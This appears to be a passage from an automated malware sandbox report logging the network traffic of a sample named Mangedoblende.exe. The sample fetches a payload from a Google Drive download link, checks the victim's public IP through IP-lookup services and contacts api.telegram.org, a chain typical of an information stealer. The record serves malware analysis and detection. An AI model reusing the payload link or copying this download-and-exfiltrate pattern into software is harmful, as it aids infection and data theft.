                                                                                                                                                                          Jan 10, 2025 19:17:24.808415890 CET53530721.1.1.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:25.981754065 CET5303253192.168.2.51.1.1.1
                                                                                                                                                                          Jan 10, 2025 19:17:25.988642931 CET53530321.1.1.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.961142063 CET5200253192.168.2.51.1.1.1
                                                                                                                                                                          Jan 10, 2025 19:17:29.968135118 CET53520021.1.1.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:31.445225000 CET5535553192.168.2.51.1.1.1
                                                                                                                                                                          Jan 10, 2025 19:17:31.452317953 CET53553551.1.1.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:33.190357924 CET4943453192.168.2.51.1.1.1
                                                                                                                                                                          Jan 10, 2025 19:17:33.197295904 CET53494341.1.1.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:46.093625069 CET5147153192.168.2.51.1.1.1
                                                                                                                                                                          Jan 10, 2025 19:17:46.100445032 CET53514711.1.1.1192.168.2.5

                                                                                                                                                                          DNS Queries

                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                          Jan 10, 2025 19:17:24.801769018 CET192.168.2.51.1.1.10x6d4cStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:25.981754065 CET192.168.2.51.1.1.10x57ccStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:29.961142063 CET192.168.2.51.1.1.10xc17eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:31.445225000 CET192.168.2.51.1.1.10xefbeStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:33.190357924 CET192.168.2.51.1.1.10x8281Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:46.093625069 CET192.168.2.51.1.1.10x99a3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                                          DNS Answers

                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                          Jan 10, 2025 19:17:24.808415890 CET1.1.1.1192.168.2.50x6d4cNo error (0)drive.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:25.988642931 CET1.1.1.1192.168.2.50x57ccNo error (0)drive.usercontent.google.com216.58.212.161A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:29.968135118 CET1.1.1.1192.168.2.50xc17eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:29.968135118 CET1.1.1.1192.168.2.50xc17eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:29.968135118 CET1.1.1.1192.168.2.50xc17eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:29.968135118 CET1.1.1.1192.168.2.50xc17eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:29.968135118 CET1.1.1.1192.168.2.50xc17eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:29.968135118 CET1.1.1.1192.168.2.50xc17eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:31.452317953 CET1.1.1.1192.168.2.50xefbeNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:31.452317953 CET1.1.1.1192.168.2.50xefbeNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:31.452317953 CET1.1.1.1192.168.2.50xefbeNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:31.452317953 CET1.1.1.1192.168.2.50xefbeNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:31.452317953 CET1.1.1.1192.168.2.50xefbeNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:31.452317953 CET1.1.1.1192.168.2.50xefbeNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:31.452317953 CET1.1.1.1192.168.2.50xefbeNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:33.197295904 CET1.1.1.1192.168.2.50x8281No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:33.197295904 CET1.1.1.1192.168.2.50x8281No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:33.197295904 CET1.1.1.1192.168.2.50x8281No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:33.197295904 CET1.1.1.1192.168.2.50x8281No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:33.197295904 CET1.1.1.1192.168.2.50x8281No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:33.197295904 CET1.1.1.1192.168.2.50x8281No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                          Jan 10, 2025 19:17:46.100445032 CET1.1.1.1192.168.2.50x99a3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                          • drive.google.com
                                                                                                                                                                          • drive.usercontent.google.com
                                                                                                                                                                          • reallyfreegeoip.org
                                                                                                                                                                          • api.telegram.org
                                                                                                                                                                          • checkip.dyndns.org

                                                                                                                                                                          HTTP Packets

                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.549937132.226.247.73801292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Jan 10, 2025 19:17:29.978159904 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Jan 10, 2025 19:17:30.647782087 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:30 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                          Jan 10, 2025 19:17:30.651956081 CET127OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Jan 10, 2025 19:17:30.859430075 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:30 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                          Jan 10, 2025 19:17:32.097290993 CET127OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Jan 10, 2025 19:17:32.308609962 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:32 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          1192.168.2.549960193.122.6.168801292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Jan 10, 2025 19:17:33.203332901 CET127OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Jan 10, 2025 19:17:34.549654007 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:34 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          2192.168.2.549972193.122.6.168801292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Jan 10, 2025 19:17:35.160285950 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Jan 10, 2025 19:17:35.959270000 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:35 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          3192.168.2.549983193.122.6.168801292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Jan 10, 2025 19:17:36.565121889 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Jan 10, 2025 19:17:37.435651064 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:37 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          4192.168.2.549989193.122.6.168801292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Jan 10, 2025 19:17:38.067591906 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Jan 10, 2025 19:17:39.408058882 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:39 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          5192.168.2.549991193.122.6.168801292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Jan 10, 2025 19:17:40.031338930 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Jan 10, 2025 19:17:41.878340006 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:41 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          6192.168.2.549993193.122.6.168801292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Jan 10, 2025 19:17:42.517492056 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Jan 10, 2025 19:17:44.143934965 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:44 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          7192.168.2.549995193.122.6.168801292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Jan 10, 2025 19:17:44.802400112 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Jan 10, 2025 19:17:45.442804098 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:45 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.549905142.250.185.1744431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:25 UTC216OUTGET /uc?export=download&id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                          Host: drive.google.com
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2025-01-10 18:17:25 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                          Content-Type: application/binary
                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:25 GMT
                                                                                                                                                                          Location: https://drive.usercontent.google.com/download?id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq&export=download
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                          Content-Security-Policy: script-src 'nonce-8yY5ZUCLhXowobbN1FBPtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                          Server: ESF
                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                          Connection: close


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          1192.168.2.549916216.58.212.1614431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:26 UTC258OUTGET /download?id=1aVyHkb4ziObNW2GCtVueavZAlvEYJlzq&export=download HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Host: drive.usercontent.google.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-01-10 18:17:29 UTC4953INHTTP/1.1 200 OK
                                                                                                                                                                          X-GUploader-UploadID: AFIdbgQko23X_r4Gvj6wUtogHpqa2A9AGfpCW0H15-gV_g8wqBhLt0DjGN6bHC-VPUlEqpgWXL4QaEc
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          Content-Security-Policy: sandbox
                                                                                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Content-Disposition: attachment; filename="oKVNWFJlyyYUXQMrMwnVOnlW8.bin"
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Length: 277056
                                                                                                                                                                          Last-Modified: Tue, 17 Dec 2024 11:04:56 GMT
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:29 GMT
                                                                                                                                                                          Expires: Fri, 10 Jan 2025 18:17:29 GMT
                                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                                          X-Goog-Hash: crc32c=HotvgQ==
                                                                                                                                                                          Server: UploadServer
                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                          Connection: close
